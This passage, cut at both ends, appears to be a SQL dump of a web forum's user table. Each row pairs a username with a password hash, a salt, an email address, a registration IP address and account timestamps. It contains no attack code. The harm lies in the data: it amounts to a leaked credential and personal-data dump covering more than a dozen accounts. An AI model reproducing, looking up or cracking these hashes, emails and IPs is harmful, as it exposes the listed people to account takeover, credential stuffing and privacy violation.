'3182befb19b221bb7d773983240e4de5', '2015-12-29', 'madelainecastella9346@pfui.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1451407716, 0, 1451407716, 1451407716, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '162.158.202.84', 0, 1, 0, 0, -1, 0, 0, 'Se`wf=rG}F|D1EAcpetO-%rb}W^p;n', 0, 0, 0, '', 0, 0, 11, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (362, 2, '', 0, 'BobSlavin', '1fb8c3ab96df4a73b3cea20c9037b9a6', '2015-12-29', 'charliedens@cachedot.net', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1451436276, 0, 1451436276, 1451436276, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '162.158.202.84', 0, 1, 0, 0, -1, 0, 0, 'Ai=f?`yJ?rR?pf&4!`LUi^\"GzqFOMZ', 0, 0, 0, '', 0, 0, 54, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (365, 2, '', 0, 'HeribertoP', '7ca46e136c76589bde3e6ea58cb0a920', '2016-01-01', 'magdabyron@0815.su', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1451648900, 0, 1451648900, 1451648900, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '162.158.203.92', 0, 1, 0, 0, -1, 0, 0, '_^w\'^0t)XbmwcU.$XDlKi|U8f9Fj6B', 0, 0, 0, '', 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (366, 2, '', 0, 'KendraChon', '226ae4c1020da7c791b506f707065f5c', '2016-01-02', 'fernesliva358@hulapla.de', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1451714197, 0, 1451714197, 1451714197, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '162.158.202.87', 0, 1, 0, 0, -1, 0, 0, '0KhS5aDzXTZR<}~[-g%VKU08`OLiBo', 0, 0, 0, '', 0, 0, 61, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (367, 2, '', 0, 'PYDDamion', '6df31c2bbe5a5f8d0fba1a1fd54c0d5c', '2016-01-03', 'earthaoreilly2257@discard.email', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1451846721, 0, 1451846721, 1451846721, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '162.158.203.89', 0, 1, 0, 0, -1, 0, 0, '3C9K\\anMc$[@^\"]]Lp@#T9*Na7D(UU', 0, 0, 0, '', 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (368, 2, '', 0, 'HildegardB', 'a1a884d1e8da3217e115b83263e6bd76', '2016-01-04', 'patryk.barski@onet.pl', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1451960090, 0, 1451960090, 1451960090, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '162.158.88.4', 0, 1, 0, 0, -1, 0, 0, 'z\\chT1Cz}].SxP.Hwn_!KAbR~M\"0@k', 0, 0, 0, '', 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (369, 2, '', 0, 'mouse55', '6595288c0470658d8f55a99363e34c21', '2016-01-06', 'mouse55@yopmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1452074203, 0, 1452074312, 1461944381, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091911, '', '0000-00-00', -1, -1, '173.245.53.71', 0, 1, 0, 0, -1, 0, 0, 'tq6=1\'D:5w|>,\"mU7y=~>pXd', 0, 0, 0, '', 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (371, 2, '', 0, 'TaniaSdc22', 'ebd0b46f3e9dba610bb6c4162d697c39', '2016-01-06', 'frederickwisniewski@germanmails.biz', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1452102172, 0, 1452102172, 1452102172, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '162.158.202.7', 0, 1, 0, 0, -1, 0, 0, '\"LazpRgG9CBFDaVKBI._#gLh%c6/O?', 0, 0, 0, '', 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (372, 2, '', 0, 'atn.seller16', '9a78d061e02ceba8f19e32ef67315361', '2016-01-07', 'anti.breeze@yahoo.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1452211656, 0, 1452211656, 1452211671, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '197.234.243.52', 0, 1, 0, 0, -1, 0, 0, 'jfW~$lLy(1{m\\],KDC$pZ-Nq!njAv=', 0, 0, 0, '', 0, 0, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (373, 2, '', 0, 'ZellaEdmon', '01c7faea4f9866a3548d2c12f6986ca0', '2016-01-08', 'siblaserna@yahoo.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1452295103, 0, 1452295103, 1452295103, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '173.245.56.184', 0, 1, 0, 0, -1, 0, 0, '\"q3U}7zi+{k\"W+~1.<0w+#sQKc/\\nr', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (374, 2, '', 0, 'Serpents0n', 'fcf357bc6a25996f026ea88d1e8f75d4', '2016-01-08', 'Serpentson@protonmail.ch', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1452297609, 0, 1459042666, 1459042666, 0, 0, 0, 0, 4, '-6', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '108.162.238.28', 0, 1, 0, 0, -1, 0, 0, 'xN&\';c~e_k&_,dti_Jr-JSlr@%<:/', 0, 0, 0, '', 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (378, 2, '', 0, 'troubler', '728fe722171735fbc4cc00b2f2567e11', '2016-01-11', 'knotty.enough@googlemail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1452546600, 0, 1452546600, 1462445422, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091911, '', '0000-00-00', -1, -1, '141.101.98.251', 0, 1, 0, 0, -1, 0, 0, '6?*f$z6f>9X#x3oaZ15[nzv6.7*<_G', 0, 0, 0, '', 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (379, 2, '', 0, 'MelvaHackl', '86ab18b541761254f9b469084afdf7da', '2016-01-12', 'tanya.tyutyakina@mail.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1452629956, 0, 1452629956, 1452629956, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '173.245.56.195', 0, 1, 0, 0, -1, 0, 0, '@RxkUbQ])^l4EmUgG)rLLR`*N]*oJn', 0, 0, 0, '', 0, 0, 49, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (380, 2, '', 0, 'ShannonCar', '09c9048e1646a0512a7af04f63e8bf6e', '2016-01-13', 'karol.razer@onet.pl', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1452711690, 0, 1452711690, 1452711690, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '108.162.238.7', 0, 1, 0, 0, -1, 0, 0, 'o=(GEf^.J1L/e%WVW5ec\\$